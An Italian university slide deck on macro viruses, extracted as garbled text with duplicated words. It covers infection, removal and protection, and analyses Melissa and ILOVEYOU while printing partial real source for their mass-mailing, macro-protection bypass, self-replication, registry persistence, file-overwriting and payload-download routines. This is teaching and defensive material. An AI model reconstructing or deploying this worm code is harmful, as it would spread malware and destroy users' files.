...

Macro Virus - Dipartimento di Informatica

by user

on
Category: Documents
11

views

Report

Comments

Transcript

Macro Virus - Dipartimento di Informatica
Macro Virus
v
v
v
v
Realizzato Da:
v
v
vBruno
Marisa
vRadica Diego
vSessa Clelia
MARISA.BRUNO@poste. it
diego.radica@libero.
diego
[email protected]
clelia28@interfree
clelia28@
interfree.. it
Macro Virus
1
v
v
Che cos’è un virus.
Definizione di Macro Virus.
Che cos’è una macro.
Come agisce un Macro Virus.
Problemi causati da Macro Virus.
Infezione e Rimozione:
1.Editor
1.
Editor di VB attivo.
2.Editor
2.
Editor di VB non attivo.
Come proteggersi.
Trattazione di due Macro Virus:
- Melissa.
- I love you
you..
Macro Virus
Che cos’è un virus informatico
2
Diffusione dei virus
Programma dotato delle seguenti
caratteristiche:
ü Deve confondersi alle istruzioni di altri
programmi modificandoli.
ü Deve essere in grado di replicarsi.
ü Dopo un tempo prestabilito, il virus
comincia a compiere l’azione per cui è stato
scritto (es.distruggere dati e/o
programmi…).
La diffusione dei virus informatici nel mondo ad Agosto 2001 in base
alla percentuale di infezioni sul totale
Bulletin Virus
Macro Virus
3
Macro Virus
4
Che cos’è una macro
Virus scritti come “macro” di applicazioni
utente:
- MS Word, Excel, Access,…
ü Possono essere eseguiti all’atto
dell’apertura di un documento.
ü Possono accedere virtualmente a tutte le
funzioni del sistema operativo.
Macro Virus
Macro Virus
Le macro sono delle procedure automatizzate
che consentono di effettuare diverse
operazioni in sequenza.
Ad es. se si vuole aggiungere a tutti i
documenti in Word una fotografia, si scrive
una macro.
5
Macro Virus
6
n
1
Esempio di macro
Protezione da macro
WORD
EXCEL
OFFICE
AutoOpen
Auto_Open
Document_Open
Document
_Open
AutoClose
Auto_Close
Auto_
Close
Document__ Close
Document
ü
Le applicazioni Word ed Excel proteggono
gli utenti a condizione che sia attiva
Protezione da macro.
macro .
Auto_Exec
Auto_
Exec
AutoExit
AutoNew
Document_New
Document
_New
Auto_Active
Auto_
Active
Auto_Deactive
Auto_
Deactive
Macro Virus
7
Verifica protezione attivata (1)
Macro Virus
8
Verifica protezione attivata (2)
In Word 2000 e Excel 2000
Macro Virus
9
Macro Virus
10
Documento contenente una
macro
Diffusione
Posta elettronica
Macro Virus
11
Macro Virus
12
n
2
Diffusione dei Macro Virus
Macro Virus
v
v
v
v
v
v
v
v
Macro Virus
13
Come agisce un Macro Virus
ü
ü
Modello di foglio bianco
caricato ogni volta che si
avvia Word
üAttacca qualsiasi Pc che ha installato Microsoft Office.
ü
Possibilità di salvare il documento solo in
formato .txt
.txt
ü Cancellazione di icone
ü Occupazione eccessiva di memoria fino al
blocco totale del sistema
ü Cancellazione di intere directory di files
dati ecc…
15
Macro Virus
Macro Virus
v
v
v
v
v
v
v
v
Che cos’è un virus.
Definizione di Macro Virus.
Che cos’è una macro.
Come agisce un Macro Virus.
Problemi causati da Macro Virus.
Infezione e Rimozione:
1.Editor
1.
Editor di VB attivo.
2.Editor
2.
Editor di VB non attivo.
Come proteggersi.
Trattazione di due Macro Virus:
- Melissa.
- I love you
you..
Macro Virus
14
Problemi causati dai Macro Virus
Disattiva la Protezione da virus di macro.
Quando si apre Word si crea una copia del Normal
Normal.. dot che
se infetto duplica anche il macro virus.
Macro Virus
Che cos’è un virus.
Definizione di Macro Virus.
Che cos’è una macro.
Come agisce un Macro Virus.
Problemi causati da Macro Virus.
Infezione e Rimozione:
1.Editor
1.
Editor di VB attivo.
2.Editor
2.
Editor di VB non attivo.
Come proteggersi.
Trattazione di due Macro Virus:
- Melissa.
- I love you
you..
Macro Virus
16
Infezione
Documento non infetto
File Header
Documento infetto
File Header
System Data
(Directory FAT)
System Data
(Directory FAT)
Testo
Fonts
Testo
Fonts
Macro (se presente)
Macro (se presente)
MACRO VIRUS
Altri Dati
Altri Dati
17
Macro Virus
18
n
3
Algoritmo per il controllo
infezione
Strumenti/opzioni/standard/attiva protezione da macro
Non Attiva
Categorie di infezione
1.
Attiva
Possibilità infezione
BASSE!!!
Strumenti/macro/editor di VB
2.
Attiva
Strumenti/Macro/Editor di VB
Non attivo!
Il macro virus c’è ma l’editor di VB
E’ attivo!
Non Attiva
Al 99%
Macro Virus
19
Macro Virus
Rimozione (1)
20
Rimozione (2)
Eliminare Normal
Normal.. dot
Individuare in normal il codice virale e cancellarlo
Editor di VB è attivo!
Editor di VB non attivo!
Salvare le modifiche al modello
Sostituirlo con uno pulito
Attivare protezione
Aprire files Word
(uno alla volta)
Attivare protezione
Compare finestra
Attiva macro
SI
Disattivare macro
Aprire files Word
(uno alla volta)
Compare finestra
Attiva macro
SI
Cancellare il codice virale
Cancellare il codice virale
NO
NO
Documento successivo
Salvare il file con un altro nome
Documento successivo
Eliminare il vecchio file
Macro Virus
ü
Salvare il file con un altro nome
Eliminare il vecchio file
21
Macro Virus
Come proteggersi
ü
Disattivare macro
22
Antivirus
Ø http://www.antivirus.
http://www.antivirus.com
com
DIFFIDARE !!!
Antivirus.
Ø
Ø
Ø
Ø
Macro Virus
23
http://www.f- secure
http://www.fsecure..com
http://www. gnd
gnd..it
it/~
/~agalli
agalli/software/antivirus.
/software/antivirus. htm
http://www.mcafee
http://www.
mcafee-- at
at-- home.
home.com
com
http://www.symantec
http://www.
symantec..com
Macro Virus
24
n
4
Macro Virus
v
v
v
v
v
v
v
v
Che cos’è un virus.
Definizione di Macro Virus.
Che cos’è una macro.
Come agisce un Macro Virus.
Problemi causati da Macro Virus.
Infezione e Rimozione:
1.Editor
1.
Editor di VB attivo.
2.Editor
2.
Editor di VB non attivo.
Come proteggersi.
Trattazione di due Macro Virus:
- Melissa.
- I love you
you..
Macro Virus
Alias: Simpson
Simpson,, Kwyjibo
Kwyjibo,, Kwejeebo
Kwejeebo,,
Mailissa,, W97M.Melissa
Mailissa
L’autore : David Lee Smith
ANNO
DANNI
1999
$1.10 Billion
25
Macro Virus
26
Computer Economics
Diffusione e attivazione
Melissa
Macro Virus scritto in VBA che si diffonde
attraverso ee-mail.
Si replica sotto MS Word 8 e 9
(Office 97 e Office 2000).
Macro Virus
27
Attraverso ee-mail con un file list.doc
list.doc;;
Viene spedito ai primi 50 nomi in rubrica (ma
se tra di essi c’è una mailing list arriva a tutti
quelli che sono abbonati);
ü Si attiva con determinate combinazioni della
data e ora (procedura trigger routine);
ü
Macro Virus
28
Modifica del Registro di
configurazione
Caratteristiche dell’edell’e - mail
Macro Virus
ü
29
Macro Virus
30
n
5
Il Codice
Trasmissione
Nome della macro infetta
Private Sub Document_Open()
On Error Resume Next
End Sub
If UngaDasOutlook = "Outlook" Then DasMapiName .Logon "profile ", "password“
"password“
For y = 1 To DasMapiName. AddressLists
AddressLists.Count
.Count
Set AddyBook = DasMapiName. AddressLists
AddressLists(y)
(y)
x=1
Set BreakUmOffASlice = UngaDasOutlook
UngaDasOutlook.. CreateItem (0)
Si autospedise ai primi 50
For oo = 1 To AddyBook
AddyBook.. AddressEntries
AddressEntries.Count
.Count
indirizzi della rubrica
Peep = AddyBook
AddyBook.. AddressEntries
AddressEntries(x)
(x)
BreakUmOffASlice.Recipients.Add
BreakUmOffASlice
.Recipients.Add Peep
x=x+1
If x > 50 Then oo = AddyBook
AddyBook.. AddressEntries
AddressEntries.Count
.Count
Next oo
BreakUmOffASlice.Subject
BreakUmOffASlice
.Subject = "Important Message From " & Application. UserName
BreakUmOffASlice.Body
BreakUmOffASlice
.Body = "Here is that document you asked for ... don't show anyone
anyone else ;;-)"
BreakUmOffASlice.Attachments.Add
BreakUmOffASlice
.Attachments.Add
Allega il documento infetto alla mail
ActiveDocument. FullName
BreakUmOffASlice.Send
BreakUmOffASlice
.Send
Peep = ""
Spedisce ee-mail
Next y
DasMapiName.Logoff
Setta il flag di Melissa installato nei registri di Windows
End If
Ignora gli errori causati da Melissa
quando è in esecuzione
Neutralizza le difese di Word contro le Macro
Macro Virus
31
Macro\Virus
System.PrivateProfileString
System.
PrivateProfileString("",
("", "HKEY_CURRENT_USER
Software \ Microsoft \ Office \ ", "Melissa?") = "... by32Kwyjibo
Kwyjibo""
End If
Replicazione e Infezione
Replicazione e Infezione
…
Set ADI1 = ActiveDocument . VBProject . VBComponents
VBComponents.. Item
Item(1)
(1)
Set NTI1 = NormalTemplate . VBProject. VBComponents
VBComponents.. Item
Item(1)
(1)
NTCL = NTI1. CodeModule
CodeModule.. CountOfLines
ADCL = ADI1.CodeModule
CodeModule .CountOfLines
BGN = 2
If ADI1.
ADI1.Name
Name <> "Melissa" Then
If ADCL > 0 Then ADI1.
ADI1.CodeModule
CodeModule . DeleteLines
DeleteLines1,
1, ADCL
Set ToInfect = ADI1
ADI1.Name
ADI1.
Name = "Melissa"
Infetta il documento corrente o quello
DoAD = True
End If
di default come infetto
…
Macro Virus
usato
If DoNT = True Then
Do While ADI1.CodeModule.
CodeModule. Lines
Lines(1,
(1, 1) = ""
ADI1.CodeModule
ADI1.
CodeModule . DeleteLines
DeleteLines11
Loop
ToInfect .CodeModule . AddFromString ("Private Sub Document
Document__Close
Close()")
()")
Do While ADI1.CodeModule.
CodeModule. Lines
Lines(BGN,
(BGN, 1) <> ""
ToInfect .CodeModule .InsertLines
InsertLinesBGN,
BGN,
ADI1.CodeModule
CodeModule .Lines
Lines(BGN,
(BGN, 1)
BGN = BGN + 1
Loop
End If
Copia il virus linea per linea nella macro Document
Document__Close
33
Macro Virus
Replicazione e Infezione
34
Replicazione e Infezione
…
CYA:
If DoAD = True Then
Do While NTI1.
NTI1.CodeModule
CodeModule.. Lines
Lines(1,
(1, 1) = ""
NTI1.CodeModule
NTI1.
CodeModule.. DeleteLines 1
Loop
ToInfect.. CodeModule
ToInfect
CodeModule.. AddFromString ("Private Sub
Document_Open()")
Document
_Open()")
Do While NTI1.
NTI1.CodeModule
CodeModule.. Lines
Lines(BGN,
(BGN, 1) <> ""
ToInfect.. CodeModule
ToInfect
CodeModule.. InsertLines BGN, NTI1.CodeModule
NTI1. CodeModule.. Lines
Lines(BGN,
(BGN, 1)
BGN = BGN + 1
Loop
End If
If NTCL <> 0 And ADCL = 0 And (InStr
(InStr(1,
(1, ActiveDocument
ActiveDocument.. Name
Name,, "Document
"Document ") =
False) Then
ActiveDocument.. SaveAs FileName:=
ActiveDocument
FileName:=ActiveDocument
ActiveDocument.. FullName
ElseIf (InStr
InStr(1,
(1, ActiveDocument
ActiveDocument.. Name
Name,, "Document
"Document")
") <> False) Then
ActiveDocument.. Saved = True
ActiveDocument
Salva il documento infetto
End If
Copia il virus linea per linea nella macro Document
Document_Open
_Open
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm?? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Worm
'Word -> Email | Word 97 <-<-- > Word 2000 ... it's a new age
age!!
Commenti
Macro Virus
35
Macro Virus
36
n
6
Trigger Routine
Trigger routine
…
If Day(
Day(Now
Now)) = Minute(Now
Minute(Now)) Then Selection.
Selection. TypeText " Twenty
Twenty--two points , plus
triple--word -score, plus fifty points for using all my letters . Game's over. I'm
triple
outta here."
here."
End Sub
Se il giorno del mese è uguale ai minuti
dell’ora ,stampa un messaggio
Macro Virus
37
Macro Virus
Come determino se si è infettati
ü
Antivirus
Esegui regedit
regedit..exe
Ø http://www.antivirus.
http://www.antivirus.com
com
Ø
Ø
Ø
ü
38
Determinare la
presenza dell’ “ospite”
Macro Virus
Ø
http://www.f- secure
http://www.fsecure..com
http://www. gnd
gnd..it
it/~
/~agalli
agalli/software/antivirus.
/software/antivirus. htm
http://www.mcafee
http://www.
mcafee-- at
at-- home.
home.com
com
http://www.symantec
http://www.
symantec..com
39
Macro Virus
40
Varianti
MELISSA.B
Ogg.messaggio
Ogg.messaggio
Testo messaggio
Allegato messaggio
Caratteristiche
"Trust no one(nome di chi invia il messaggio)“
Be careful what you open, it could be a virus
Un documento infettato dal virus
Invia una copia di se stesso al primo indirizzo di Outlook
MELISSA.C
Ogg.messaggio
Ogg.messaggio
Testo messaggio
Allegato messaggio
Caratteristiche
"Fun and games from (nome di chi invia il messaggio)“
HI! Check out this neat doc I found on the internet!
Un documento infettato dal virus
Invia una copia di se stesso ai primi 69 indirizzi di Outlook
MELISSA.D
Ogg.messaggio
Ogg.messaggio
Testo messaggio
Allegato messaggio
Caratteristiche
"Mad Cow Joke (nome di chi invia il messaggio)“
Beware of the spread of the Madcow disease
Un documento infettato dal virus
Invia una copia di se stesso ai primi 20 indirizzi di Outlook
Macro Virus
Alias: LoveLetter
LoveLetter,, Lovebug
Lovebug,,
I-Worm
Worm.. LoveLetter
L’autore :
41
ANNO
DANNI
2000
$8.75 Billion
Computer Economics
Macro Virus
42
n
7
I Love You
Dove Funziona
Internet worm scritto in VBScript per WSH
che si diffonde attraverso ee-mail create con
Microsoft Outlook.
ü
Sistemi Windows dove è presente WSH
(installato per default in Windows 98/2000)
ü Sistemi dove è installato Internet Explorer
5.x
Più pericoloso di Melissa, perché si spedisce
a tutti i contatti della Rubrica.
Macro Virus
43
Diffusione
ü
ü
Macro Virus
44
Il codice
Posta elettronica
mIRC
Il primo commento inserito nel codice
sorgente è:
rem barok –loveletter
loveletter((vbe
vbe)) <i hate go to school>
school>
rem by : spyder / ispyder
ispyder@mail.
@mail.com
com / @GRAMMERSoft
@GRAMMERSoft
Group / Manila, Philippines
Macro Virus
45
Il codice
v regruns
regruns()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
v folderlist
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
v regcreate
regcreate((regkey
regkey,,
Macro Virus
46
main()
main
()
Imposta alcune variabili usate
nelle successive routine e crea
tre files
files..
v main()
Macro Virus
47
…
wscr=
wscr
=CreateObject
CreateObject("
("WScript
WScript.Shell")
.Shell")
rr=
rr
=wscr
wscr..RegRead
RegRead("HKEY_CURRENT_USER
("HKEY_CURRENT_USER\\Software \Microsoft
Microsoft\\Windo
ws ScriptingHost
ScriptingHost\\Settings
Settings\\ Timeout")
if (rr
(rr>=1)
>=1) then
wscr..RegWrite "HKEY_CURRENT_USER
wscr
"HKEY_CURRENT_USER\\Software \Microsoft
Microsoft\\Windows
ScriptingHost\\Settings \Timeout",0,"REG_DWORD
ScriptingHost
Timeout",0,"REG_DWORD“
“
Creazione
files
end if
• MSKernel32. vbs
….
• Win32DLL. vbs
c.Copy(dirsystem
c.Copy(
dirsystem&"
&"\\MSKernel32.
MSKernel32.vbs
vbs")
")
• LOVE
LOVE--LETTER -FOR
FOR-c.Copy(dirwin
c.Copy(
dirwin&"
&"\\Win32DLL.
Win32DLL.vbs
vbs")
")
YOU.TXT.vbs
YOU.TXT.
vbs
c.Copy(dirsystem
c.Copy(
dirsystem&"
&"\\LOVE
LOVE-- LETTER
LETTER-- FOR
FOR-- YOU.TXT.
YOU.TXT.vbs
vbs")
")
…
Macro Virus
48
n
8
Il codice
regruns()
regruns
()
•Inserisce nel registro due
chiavi
•Individua la directory per
scaricare dei files da Internet.
Modifica la pagina iniziale di
MS Internet Explorer
Explorer..
v main()
v regruns
regruns()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
v folderlist
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
v regcreate
regcreate((regkey
regkey,,
Macro Virus
…
regcreate"HKEY_LOCAL_MACHINE
regcreate
"HKEY_LOCAL_MACHINE\\Software
Software\\Microsoft
Microsoft\\Wi
ndows\\CurrentVersion
ndows
CurrentVersion\\Run
Run\\MSKernel32
MSKernel32",
",dirsystem
dirsystem&
& "\
"\MS
Kernel32.vbs
Kernel32.
vbs“
“
regcreate"HKEY_LOCAL_MACHINE
regcreate
"HKEY_LOCAL_MACHINE\\Software
Software\\Microsoft
Microsoft\\Wi
ndows\\CurrentVersion
ndows
CurrentVersion\\RunServices
RunServices\\Wi
Win32DLL
n32DLL“
“, dirwin
dirwin&
&"
\Win32DLL.
Win32DLL.vbs
vbs“
“
…
Inserisce nel registro due chiavi che fanno eseguire
all’avvio del sistema i due script:
MSKernel32.vbs
MSKernel32.vbs
Win32DLL.vbs
Win32DLL.
vbs
49
Macro Virus
50
regruns()
regruns
()
regruns()
regruns
()
…
downread="
downread
="“
“
downread=
downread
=regget
regget("HKEY_CURRENT_USER
("HKEY_CURRENT_USER\\Software \Microsoft
Microsoft\\Internet
Explorer\\Download Directory")
Explorer
if (downread
(downread="")
="") then
Individua la directory
downread="c:
downread
="c:\\“
impostata per lo
scaricamento dei files
end if
da Internet
…
…
if (fileexist
(fileexist(( dirsystem
dirsystem&"
&"\\WinFAT32.exe")=1) then
Randomizenum = Int
Int((4
((4 * Rnd
Rnd)) + 1)
if num = 1 then
regcreate "HKCU
"HKCU\\Software \Microsoft
Microsoft\\Internet Explorer\
Explorer\Main
Main\\Start
Page","http://www.skyinet
Page","http://www.
skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwe
.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwe
trdsfmhPnjw6587345gvsdf7679njbvYT/WIN
trdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-- BUGSFIX.exe"
…
Macro Virus
51
Macro Virus
regruns()
regruns
()
Se esiste WinFAT32.exe
WinFAT32.exe il
worm modifica (attraverso il
registro) la pagina iniziale di MS
Internet Explorer inserendo la
URL del file WINWINBUGFIX.EXE del sito
www.skyinet
www.
skyinet.net
.net
52
Il codice
…
if (fileexist
(fileexist(( downread
downread&"
&"\\WIN
WIN-- BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE
"HKEY_LOCAL_MACHINE\\Software \Microsoft
Microsoft\\Windows
Windows\\Curr
entVersion\\Run
entVersion
Run\\WIN
WIN-- BUGSFIX",
BUGSFIX",downread
downread&"
&"\\WIN
WIN-- BUGSFIX.exe
BUGSFIX.exe“
“
regcreate "HKEY_CURRENT_USER
"HKEY_CURRENT_USER\\Software \Microsoft
Microsoft\\Internet
Explorer\\Main
Explorer
Main\\StartPage
StartPage","about:blank
","about:blank“
“
end if
v main()
Analizza i drives presenti nel
disco e per ogni unità esegue
la funzione folderlist
v regruns
regruns()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
v folderlist
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
v regcreate
regcreate((regkey
regkey,,
Verifica l’ esistenza di WINWIN- BUGFIX.
BUGFIX.exe
exe e
imposta il registro per eseguirlo ad ogni avvio
del computer.
La pagina iniziale di IE diventa “about
“about::blank
blank””
Macro Virus
53
Macro Virus
54
n
9
Il codice
Modifica i files
files::
infectfiles((folderspec
infectfiles
folderspec))
• Script
• Fogli di stile
•JPEG, MP3, MP2
v main()
v regruns
regruns()
()
Sovrascrive i files con una
copia del worm
worm..
Cerca il software mIRC
v listadriv
listadriv()
()
per inviare pagina html
contenente copia del worm
v infectfiles
infectfiles((folderspec )
v folderlist
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
v regcreate
regcreate((regkey
regkey,,
Macro Virus
…
if (ext="vbs
(ext="vbs")
") or (ext="vbe
(ext="vbe")
") then
set ap
ap=
= fso
fso.. OpenTextFile
OpenTextFile(f1.path,2,true)
(f1.path,2,true)
ap.write
ap
.write vbscopyap .close
elseif(ext="
elseif
(ext="js
js")
") or (ext="jse
(ext="jse")
") or (ext="css
(ext="css")
") or (ext="wsh
(ext="wsh")
") or (ext="sct
(ext="sct")or
")or
(ext="hta
(ext="
hta")
") then
set ap
ap=
= fso
fso.. OpenTextFile
OpenTextFile(f1.path,2,true)
(f1.path,2,true)
ap.write
ap
.write vbscopy
Individua tutti i
files con script o
ap.close
ap
.close
fogli di stile (*.
(*.vbs
vbs,,
bname=
bname
= fso
fso.. GetBaseName
GetBaseName(f1.path)
(f1.path)
*.vbe
*.
vbe,,
set cop=fso
cop=fso.. GetFile
GetFile(f1.path)
(f1.path)
*.js
*.
js,*.
,*.jse
jse,*.
,*.css
css,*.
,*.ws
ws
cop.copy(folderspec
cop.copy(
folderspec&"
&"\\"&
"&bname
bname&".
&".vbs
vbs")
")
h ,*.
,*.sct
sct,*.
,*.hta
hta))
fso.. DeleteFile
fso
DeleteFile(f1.path)
(f1.path)
…
55
Macro Virus
56
infectfiles((folderspec
infectfiles
folderspec))
infectfiles((folderspec
infectfiles
folderspec))
elseif(ext="jpg
elseif(ext="
jpg")
") or (ext="jpeg") then
setap=
setap
=fso
fso..OpenTextFile (f1.path,2,true)
(f1.path,2,true)ap
ap.write
.write vbscopy
ap.close
ap
.close
Le immagini
JPEG(*.jpg
JPEG(*.
jpg,*.
,*.jpeg
jpeg ) e i
set cop=fso
cop=fso..GetFile (f1.path)
fileMP3 e MP2 vengono
cop.copy(f1.path&".vbs
cop.copy(f1.path&".
vbs")
")
sovrascritti da un file con
fso..DeleteFile (f1.path)
fso
lo stesso nome con
estensione *. vbs e come
elseif(ext="mp3")
elseif
(ext="mp3") or (ext="mp2") then
contenuto una copia del
set mp3=fso
mp3=fso..CreateTextFile (f1.path&".
(f1.path&".vbs
vbs")
")
worm
mp3.write vbscopy
mp3.close
…
if (eq
(eq<>
<>folderspec
folderspec)) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc
(s="mirc .ini
ini")
") or(s="script.ini
or(s="script.ini")
") or
(s="mirc
(s="
mirc .hlp
hlp")
") then
set
scriptini=
scriptini
=fso
fso..CreateTextFile ( folderspec
folderspec&"
&"\\script.
script.ini
ini")
")
scriptini..WriteLine "[script]
scriptini
"[script]««
scriptini..WriteLine ";
scriptini
";mIRC
mIRC Script
Script««
scriptini..WriteLine "; Please dont edit this script... mIRC will corrupt,
scriptini
if mIRC will
will”
”
Cerca il software mIRC e crea nella sua cartella il file
…
“SCRIPT.INI”, che contiene i comandi per inviare una
pagina html contenente la copia del worm
worm..
Macro Virus
57
Macro Virus
Il codice
58
Il codice
v main()
v main()
v regruns
regruns()
()
v regruns
regruns()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
Chiama
infectfiles(( folderspec
infectfiles
folderspec))
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
v folderlist
v folderlist
v regcreate
regcreate((regkey
regkey,,
v regcreate
regcreate((regkey
regkey,,
Macro Virus
Imposta i
registri
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
59
Macro Virus
60
n
10
Il codice
Caratteristiche dell’edell’e - mail
v main()
v regruns
regruns()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
Legge gli indirizzi ee-mail
nella rubrica e prepara per
ognuno l’el’e-mail
Oggetto: ILOVEYOU.
Contenuto: kindly check the attached
LOVELETTER coming from me.
Allegato: LOVE
LOVE-- LETTER
LETTER-- FOR
FOR-- YOU.TXT.
YOU.TXT.vbs
vbs..
v folderlist
(folderspec
folderspec))
regvalue))
regvalue
v spreadtoemail
spreadtoemail()
()
v html
html()
()
v regcreate
regcreate((regkey
regkey,,
Macro Virus
61
Il codice
Macro Virus
62
Creazione pagina HTML
v main()
v regruns
regruns()
()
v listadriv
listadriv()
()
v infectfiles
infectfiles((folderspec )
v folderlist
(folderspec
folderspec))
regvalue))
regvalue
Crea una pagina HTML
v spreadtoemail
spreadtoemail()
()
contenente codice virale nella
directory di Windows.
v html
html()
()
v regcreate
regcreate((regkey
regkey,,
Macro Virus
Utilizzata per infezione attraverso mIRC
mIRC..
63
Come proteggersi
ü
ü
ü
64
Impostazione di Outlook
Impostare il client di posta elettronica (ad es.
Outlook), in modo da non aprire il messaggio in
anteprima.
Creazione regola di posta.
Controllare gli allegati (prima dell’
dell’ apertura!) con
un antivirus.
Macro Virus
Macro Virus
Visualizza - Visualizzazione corrente
Visualizzadeselezionare Messaggi con Anteprima.
65
Macro Virus
66
n
11
Creazione regola di posta
Creazione regola di posta
Strumenti--Regole MessaggiStrumenti
Messaggi- Posta Elettronica
Macro Virus
67
Macro Virus
Creazione regola di posta
Macro Virus
68
Creazione regola di posta
69
Macro Virus
Creazione regola di posta
70
Antivirus
Ø http://www.antivirus.
http://www.antivirus.com
com
Ø
Ø
Ø
Ø
Macro Virus
71
http://www.f- secure
http://www.fsecure..com
http://www. gnd
gnd..it
it/~
/~agalli
agalli/software/antivirus.
/software/antivirus. htm
http://www.mcafee
http://www.
mcafee-- at
at-- home.
home.com
com
http://www.symantec
http://www.
symantec..com
Macro Virus
72
n
12
Rimozione
Varianti
ü
File ".VBS" da tutte le cartelle di tutti i
drive.
ü File LOVELOVE- LETTER
LETTER--FOR
FOR-- YOU.HTM
dalla cartella di sistema di Windows.
ü File WINWIN- BUGSFIX.EXE e
WINFAT32.EXE dalla cartella dei file
scaricati di Internet Explorer
Explorer..
ü Per mIRC
mIRC,, cancellare il file "script.ini
"script.ini"" dalla
cartella dove è installato mIRC
mIRC..
Macro Virus
73
Conclusione
CONTENUTO
ALLEGATO
US PRESIDENT AND
“VERY JOKE..! SEE
PRESIDENT AND FBI
TOP SECRET
PICTURES..”
President.. vbs
President
FBI SECRETS
JOKE
MOTHERS DAY
<nessuno>
Very Funny.
Funny .vbs
We have proceeded to
change your credit card
Mothersday . vbs
for the amount of $326.92
…
Macro Virus
74
ANNOTAZIONE
Questo lavoro è stato preparato a scopo
puramente didattico!!!
Il contagio si è propagato solo attraverso il
software di posta della Microsoft…
Diversificare non fa altro che rafforzare,
mentre l’uniformità provoca
l’indebolimento.
Macro Virus
OGGETTO
A fronte delle conoscenze date è stato evidenziato l’aspetto
della prevenzione e della rimozione.
Pertanto il codice riportato è stato modificato ed è
incompleto; non ci assumiamo nessuna responsabilità
dell’utilizzo improprio di questo lavoro!!!
75
Macro Virus
76
n
13
Fly UP